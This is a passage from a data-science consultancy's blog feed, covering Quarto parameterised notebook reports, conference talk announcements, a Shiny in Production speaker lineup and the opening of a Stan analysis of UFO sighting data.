default value for our &lt;code&gt;track&lt;/code&gt; parameter. Running the following will therefore
generate a report for Rainbow Road:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render mario_kart.ipynb --execute
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we want to report on the &lt;code&gt;&amp;quot;Moo Moo Farm&amp;quot;&lt;/code&gt; world records instead, we can pass
this to the &lt;code&gt;track&lt;/code&gt; parameter on the command line using the &lt;code&gt;-P&lt;/code&gt; flag:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render mario_kart.ipynb -P track:&lt;span style="color:#a5d6ff"&gt;&amp;#34;Moo Moo Farm&amp;#34;&lt;/span&gt; --execute
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You may have noticed that running the above command actually inserts a cell
defining the &lt;code&gt;track&lt;/code&gt; variable as &amp;ldquo;Moo Moo Farm&amp;rdquo; into &lt;code&gt;mario_kart.ipynb&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Injected Parameters&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;track &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Moo Moo Farm&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="further-reading"&gt;Further reading&lt;/h3&gt;
&lt;p&gt;We&amp;rsquo;ve only covered using Jupyter and Quarto from VS Code in this post. The
&lt;a href="https://quarto.org/docs/tools/jupyter-lab-extension.html" rel="external"&gt;Quarto documentation&lt;/a&gt;
contains details on how to set up Jupyter Lab with Quarto.&lt;/p&gt;
&lt;p&gt;Quarto is also used by the nbdev platform, which enables developers to write
software with high-quality documentation in a notebook-driven environment.
Check out the &lt;a href="https://nbdev.fast.ai/" rel="external"&gt;nbdev documentation&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/reproducible-reports-jupyter-quarto-python/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>posit::conf(2023)</title><link>https://www.jumpingrivers.com/blog/posit-conf-2023/</link><pubDate>Thu, 14 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/posit-conf-2023/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/posit-conf-2023/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/posit-conf-2023/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Our bags are packed, flights are booked, and we&amp;rsquo;re ready to head stateside for &lt;a href="https://posit.co/conference/" rel="external"&gt;posit::conf(2023)&lt;/a&gt;. We&amp;rsquo;re excited to be sponsoring the event this year, as well as presenting &lt;a href="https://reg.conf.posit.co/flow/posit/positconf23/attendee-portal/page/sessioncatalog?search=Jumping%20Rivers" rel="external"&gt;a few talks ourselves&lt;/a&gt;. You&amp;rsquo;ll be able to fine Colin, Liam and Rich at the Jumping Rivers exhibition stand for the week, come along, say hello, and get your hands on one of our coveted JR coasters.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-posit-conf-highlights"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-road-to-easier-shiny-app-deployments---liam-kalita"&gt;The Road to Easier Shiny App Deployments - Liam Kalita&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;15:00 CDT - Tuesday 19th September&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re often helping developers to assess, fix and improve their Shiny apps, and often the first thing we do is see if we can deploy the app. If you can&amp;rsquo;t deploy your Shiny app, it&amp;rsquo;s a waste of time. If you can deploy it successfully, then at the very least it runs, so we&amp;rsquo;ve got something to work with. There are a bunch of reasons why apps fail to deploy. They can be easy to fix, like Hardcoded secrets, fonts, or missing libraries. Or they can be intractable and super frustrating to deal with, like manifest mismatches, resource starvation, and missing libraries. At the end of this talk, I want you to know how to identify, investigate and proactively prevent Shiny app deployment failures from happening.&lt;/p&gt;
&lt;h3 id="getting-the-most-out-of-git---colin-gillespie"&gt;Getting the Most Out of Git - Colin Gillespie&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;16:00 CDT - Tuesday 19th September&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Did you believe that Git will solve all of your data science worries? Instead, you&amp;rsquo;ve been plunged HEAD~1 first into merging (or is that rebasing?) chaos. Issues are ignored, branches are everywhere, main never works, and no one really knows who owns the repository.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t worry! There are ways to escape this pit of despair. Over the last few years, we&amp;rsquo;ve worked with many data science teams. During this time, we&amp;rsquo;ve spotted common patterns and also common pitfalls. While one size does not fit all, there are golden rules that should be followed. At the end of this talk, you&amp;rsquo;ll understand the processes other data science teams implement to make Git work for them.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/posit-conf-2023/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Full speaker lineup</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/</link><pubDate>Thu, 07 Sep 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We are pleased to announce the full line-up for this year&amp;rsquo;s &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference! Don&amp;rsquo;t miss out on this excellent set of talks and workshops - head over to the conference website to sign up now!&lt;/p&gt;
&lt;h3 id="workshops"&gt;Workshops&lt;/h3&gt;
&lt;p&gt;This year&amp;rsquo;s workshops consist of two delivered by our JR trainers, and one by a special guest, Andrie de Vries of Posit!&lt;/p&gt;
&lt;h4 id="andrie-de-vries---posit"&gt;&lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andrie de Vries&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Introduction to Shiny for Python&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This workshop provides an introduction to coding a web application using Shiny for Python. It is aimed at providing R users, who are already familiar with Shiny, the tools and understanding to write similar apps using Python. In addition to using Shiny for Python yourself, this will also give you the capability to discuss Shiny with your Python colleagues, for example when you work in a bi-lingual data science team.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/andrie@2x.jpg" alt="Photo of Andrie de Vries" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Andrie is Director of Product Strategy at Posit (formerly RStudio) where he works on the Posit commercial products. He started using R in 2009 for market research statistics, and later joined Revolution Analytics and then Microsoft, where he helped customers implement advanced analytics and machine learning workflows. To keep healthy, he practices yoga and does some recreational running and canoeing.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="keith-newman---jumping-rivers"&gt;Keith Newman - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Building Responsive Shiny Applications&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The diverse range of devices used for modern web browsing presents challenges when designing an application that works well for all users. Enter responsive design: the practice of building fluid web pages that “work” on huge 4k and 5k monitors, tiny smartphones and all things in between. This course will look at responsive design principles and best practices for Shiny developers, covering page layout, easy-to-add widgets and some simple CSS tricks for when built-in solutions don’t quite cut it.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/keith@2x.jpg" alt="Photo of Keith Newman" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Following a PhD in statistics at Newcastle University, Keith developed software to improve road safety modelling. He enjoys creating Shiny apps and teaching the use of R.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="russ-hyde---jumping-rivers"&gt;Russ Hyde - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Shiny Testing&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Automated testing plays a vital role in any production-grade software project. But what benefit does well-tested code bring to a project, and how do you write a good test suite for your shiny application? In this workshop, we demonstrate how to document the behaviour of an application using browser-driven end-to-end tests and show that lower-level, module- or function-focussed, tests make development a happier and more predictable experience. The tools used here (shinytest2, testServer) all build upon the testthat package.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/russ@2x.jpg" alt="Photo of Russ Hyde" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Russ has previouly worked in molecular biology and bioinformatics. He holds a PhD in Molecular Physiology and MSc in Mathematics. Russ is an author of several CRAN packages and mentor on the R-for-data-science community.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-full-lineup"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="talks"&gt;Talks&lt;/h3&gt;
&lt;p&gt;The second day of the conference will consist of a great line up of talks from people from a variety of industries!&lt;/p&gt;
&lt;h4 id="keynote-george-stagg---posit"&gt;&lt;strong&gt;Keynote:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/george-w-stagg/" rel="external"&gt;George Stagg&lt;/a&gt; - &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;R Shiny without a server: webR and Shinylive&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;WebAssembly (Wasm) is a technology that enables software that’s normally compiled for a specific computer system to instead run anywhere, including inside web browsers. WebR is a version of the R interpreter compiled for Wasm, bringing this technology to the R world.&lt;/p&gt;
&lt;p&gt;Earlier this year, the initial version of webR was released and users have already begun building new interactive experiences with R on the web. The latest release, version 0.2.0, includes improvements to graphics, accessibility and internationalisation, developer API updates, and introduces a new webR REPL app. The release also includes expanded support for Wasm R packages, including the ability to run fully client-side Shiny apps.&lt;/p&gt;
&lt;p&gt;In this talk, I’ll introduce webR with some simple examples and discuss some details of how the system works. I’ll talk about how JavaScript APIs can be used to integrate webR into wider web applications and describe webR’s communication channel. Finally, I’ll give a description of how Shiny apps can be run using webR without an R server, ending with a demo of an in-development “Shinylive for R”.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/george@2x.jpg" alt="Photo of George Stagg" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;George is a software engineer working on the webR project as part of the Open Source Team at Posit Software PBC. A former academic, George also has experience with teaching and research in computational mathematics, statistics and physics. When not working with software, George enjoys hacking hardware, photography, fantasy &amp;amp; sci-fi, and tinkering with electronic synthesisers.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="keynote-cara-thompson---freelance-data-consultant"&gt;&lt;strong&gt;Keynote:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/cararthompson/" rel="external"&gt;Cara Thompson&lt;/a&gt; - &lt;a href="https://linktr.ee/cararthompson" rel="external"&gt;Freelance Data Consultant&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Dynamic annotations: tips and tricks to make text shine without stealing the show&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Data. It&amp;rsquo;s complicated! And there are often many facets to our data stories, which we need to present succinctly enough for our readers to want to engage with. On top of that, it changes! If we want our apps to reflect up-to-date data, how do we make sure the annotations stay up to date, and don&amp;rsquo;t end up off the edge of the plot or on top of each other with the next batch of data?&lt;/p&gt;
&lt;p&gt;In this talk, we will explore how to make text work for us, by first considering how much of it we really need. Once we&amp;rsquo;ve decluttered and explored how we can use colours to make our plots less text-dependent, we&amp;rsquo;ll look at how to optimise text hierarchy in descriptions and in-plot annotations to keep the main thing the main thing, and how to create dynamic content and alignments for our titles, subtitles, axes, and annotations. Finally, we&amp;rsquo;ll explore coding tricks to apply these typography tips to tables and interactive plots, giving readers additional information on demand. Throughout the talk, I will share the packages and code snippets used to create and modify plots in R straight from readily available data, as well as tools which we can use to check for accessibility in our dataviz design decisions.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/cara@2x.jpg" alt="Photo of Cara Thompson" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Cara is a freelance data consultant with an academic background, specialising in dataviz and in &amp;ldquo;enhanced&amp;rdquo; reproducible outputs. She lives in Edinburgh, Scotland, and is passionate about maximising the impact of other people&amp;rsquo;s expertise.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="naomi-bradbury-clareece-nevill--janion-nevill---complex-reviews-support-unit"&gt;Naomi Bradbury, Clareece Nevill &amp;amp; Janion Nevill - &lt;a href="https://www.gla.ac.uk/research/az/evidencesynthesis/apps-materials-guidence/" rel="external"&gt;Complex Reviews Support Unit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Health Data Scientists Developing Production Grade Shiny Apps&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In 2017 a group of Biostatisticians at the University of Leicester embarked on two mini-projects to investigate the feasibility of using R Shiny apps to perform meta-analyses. Six years later, we have produced a suite of four R Shiny apps that automate network meta-analysis and diagnostic test accuracy meta-analysis, allowing researchers and healthcare professionals to access cutting-edge statistical analysis techniques without the need to write their own code. We also have two further apps currently in development. Our apps have approximately 1,000 user hours each month across the globe, and they have been used to conduct numerous published meta-analyses and in the development of clinical guidelines.&lt;/p&gt;
&lt;p&gt;In this talk, we will give an overview of the project and the lessons we have learned (and are still learning) along the way as research scientists entering the world of software development, and how the power of R Shiny has enabled us to achieve this. We will discuss:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How we transitioned from working individually on apps to creating a research software development team&lt;/li&gt;
&lt;li&gt;Leveraging existing R analysis packages to avoid ‘reinventing the wheel’ and ensuring our users could be confident in the accuracy of the results delivered&lt;/li&gt;
&lt;li&gt;Developing novel data visualisations available within the MetaInsight and MetaDTA apps&lt;/li&gt;
&lt;li&gt;Creating a living network meta-analysis of treatments for COVID-19 during the pandemic using a combination of R Shiny, Python and a Raspberry Pi&lt;/li&gt;
&lt;li&gt;The changing landscape of Shiny app development and journal publication of apps across the time span of the project.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speakers&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/crsu@2x.jpg" alt="CRSU logo" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Naomi, Clareece and Janion are part of the Complex Reviews Support Unit (CRSU) based at the University of Leicester. The CRSU began in 2015 as a support group of experts in the field of evidence synthesis, but now include a strong interdisciplinary team primarily tasked with developing and maintaining the CRSU’s suite of Shiny apps for assisting evidence synthesis.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="chris-brownlie---barnett-waddingham"&gt;&lt;a href="https://www.linkedin.com/in/cnbrownlie/" rel="external"&gt;Chris Brownlie&lt;/a&gt; - &lt;a href="https://www.barnett-waddingham.co.uk/" rel="external"&gt;Barnett Waddingham&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Anatomy of a Shiny app&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Have you ever wondered what really goes on under the hood of a Shiny app? What the building blocks are and how they fit together to enable us to build reactive web apps using R? Shiny apps are made up of a collection of objects that all link with each other and external sources to make the app work. These objects and methods interact in various ways in order to: start up the app, build the reactive graph, handle reactivity and much more. In addition to this, the inner workings of Shiny rely on the use of other, less well-known R packages.&lt;/p&gt;
&lt;p&gt;In this presentation I&amp;rsquo;ll be exploring the building blocks of Shiny - such as the Shiny Session, reactive context and reactive log - as well as the key functions provided by Shiny&amp;rsquo;s dependencies, giving a high-level overview of how they fit together and what they are each responsible for in the lifecycle of an app. I&amp;rsquo;ll also discuss how understanding these can be useful when debugging or monitoring a production Shiny app.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/chris@2x.jpg" alt="Photo of Chris Brownlie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Chris is an analytics consultant in the Management Decision Analytics team at Barnett Waddingham, specialising in R and Shiny-app development. He comes from a background in data science and formerly worked in the public sector. Besides coding he enjoys rugby, reading fantasy books and spending time with his dog, Nero.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="colin-gillespie---jumping-rivers"&gt;&lt;a href="https://www.linkedin.com/in/colin-gillespie-25028332/" rel="external"&gt;Colin Gillespie&lt;/a&gt; - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Securing Shiny Dashboards&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Shiny apps, Rmarkdown reports and flask dashboards provide a rich user experience for relatively little development time. Often this experience is created by utilising third-party Javascript functions, CSS files, fonts and images, but every external file we use means we implicitly trust the authors. The NHS and thousands of other government websites can attest that this is an issue; in 2018, they ran scripts that made their visitors use their computing power to mine cryptocurrencies.&lt;/p&gt;
&lt;p&gt;This talk will look at how organisations can improve their Shiny application security. We’ll discuss general procedures for securing your overall workflow, such as security audits of your R packages and general Git security. We’ll then see how Content Security Policies (CSPs) can be leveraged in Shiny apps, which allow a website to specify what external content a site can access. This talk will discuss implementing these precautions within Shiny and Posit Connect. We&amp;rsquo;ll demonstrate that securing and monitoring your applications is relatively straightforward.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/colin@2x.jpg" alt="Photo of Colin Gillespie" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Colin has been using R since 1999. He&amp;rsquo;s the author of a number of R packages and has published the book Efficient R Programming with O&amp;rsquo;Reilly.&lt;/p&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h4 id="tan-ho---zelus-analytics"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt; - &lt;a href="https://zelusanalytics.com/" rel="external"&gt;Zelus Analytics&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Effective Logging for Shiny&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This talk will share some strategies I&amp;rsquo;ve found effective in setting up logging for Shiny apps to help with debugging applications both in development and when deployed to production.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/tan@2x.jpg" alt="Photo of Tan Ho" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Tan is a data nerd from Ottawa, Canada who loves R, Shiny, fantasy football and carving pumpkins! By day, he&amp;rsquo;s an ML engineer for Zelus Analytics. In his spare time, he maintains DynastyProcess.com Trade Calculator (a Shiny app that serves over 200,000 unique monthly users), develops nflverse R packages, and mentors in the R4DS Slack Community.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="liam-kalita---jumping-rivers"&gt;Liam Kalita - &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;The Road to Easier Shiny App Deployments&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re often helping developers to assess, fix and improve their Shiny apps, and often the first thing we do is see if we can deploy the app. If you can&amp;rsquo;t deploy your Shiny app, it&amp;rsquo;s a waste of time. If you can deploy it successfully, then at the very least it runs, so we&amp;rsquo;ve got something to work with.&lt;/p&gt;
&lt;p&gt;There are a bunch of reasons why apps fail to deploy. They can be easy to fix, like Hardcoded secrets, fonts, or missing libraries. Or they can be intractable and super frustrating to deal with, like manifest mismatches, resource starvation, and missing libraries.&lt;/p&gt;
&lt;p&gt;At the end of this talk, I want you to know how to identify, investigate and proactively prevent Shiny app deployment failures from happening.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/liam@2x.jpg" alt="Photo of Liam Kalita" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Liam has been the InfoSec Lead at Jumping Rivers since the start of 2023, specialising in compliance, security controls, and policies (GDPR, Cyber Essentials, ISO 27001). With a previous 2 years in infrastructure support and consultancy, he ensures secure Shiny app and Posit platform deployments, and promotes a culture of security awareness within the company.&lt;/p&gt;
&lt;br/&gt;
&lt;h4 id="anna-skrzydło---appsilon"&gt;&lt;a href="https://www.linkedin.com/in/anna-skrzydlo/" rel="external"&gt;Anna Skrzydło&lt;/a&gt; - &lt;a href="https://appsilon.com/" rel="external"&gt;Appsilon&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;3 reasons why nobody uses your app&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You’ve built a great app. You are sure that once your coworkers will start using it, their life will be so much easier. You are waiting for some signs of success: your happy colleagues praising the app or recommending it to others. But … it doesn’t come. Does it sound familiar? Have you ever wondered why nobody is using your app? Come to my talk and wonder no more. During my talk I will present 3 main reasons for low user adoption: don’t need the app, can’t use the app and don’t trust the app. I will not only share the examples, but also recipes on how to deal with each of those situations.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;About the speaker&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;img src="images/anna@2x.jpg" alt="Photo of Anna Skrzydło" style="width: 200px; display: block; margin-left: auto; margin-right: 1em; float: left"/&gt;
&lt;p&gt;Anna is a Delivery Manager, Business Analyst, and R/Shiny developer with over 10 years of professional experience leading software and Data Science projects, facilitating user workshops and mentoring Project Managers. She is a regular speaker at industry conferences, including WhyR, UseR and Data Science Summit - Dog lover, salsa dancer and stand-up comedy fan.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-full-lineup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Using Stan to analyse global UFO sighting reports</title><link>https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/</link><pubDate>Thu, 31 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="ufo-sighting-data"&gt;UFO sighting data&lt;/h2&gt;
&lt;p&gt;A recent &lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2023/2023-06-20/readme.md" rel="external"&gt;#TidyTuesday&lt;/a&gt; data set piqued my interest. It&amp;rsquo;s a rather large collection of worldwide &lt;em&gt;reportings&lt;/em&gt; of UFO sightings.&lt;/p&gt;
&lt;p&gt;Interesting.&lt;/p&gt;
&lt;p&gt;You can download the data yourself and load it into R:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ufo_sightings.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;ufo_sightings&lt;/code&gt; contains information about thousands of UFO sightings. Each sighting contains information such as the date and time (&lt;code&gt;reported_date_time&lt;/code&gt;, &lt;code&gt;day_part&lt;/code&gt;) of the sighting, the location (&lt;code&gt;city&lt;/code&gt;, &lt;code&gt;state&lt;/code&gt;, &lt;code&gt;country&lt;/code&gt;) of the sighting, and other information such as a freetext summary. The &lt;code&gt;summary&lt;/code&gt; column is by far the most interesting &amp;hellip;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ufo_sightings &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(city, day_part, summary) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 6 × 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; city day_part summary
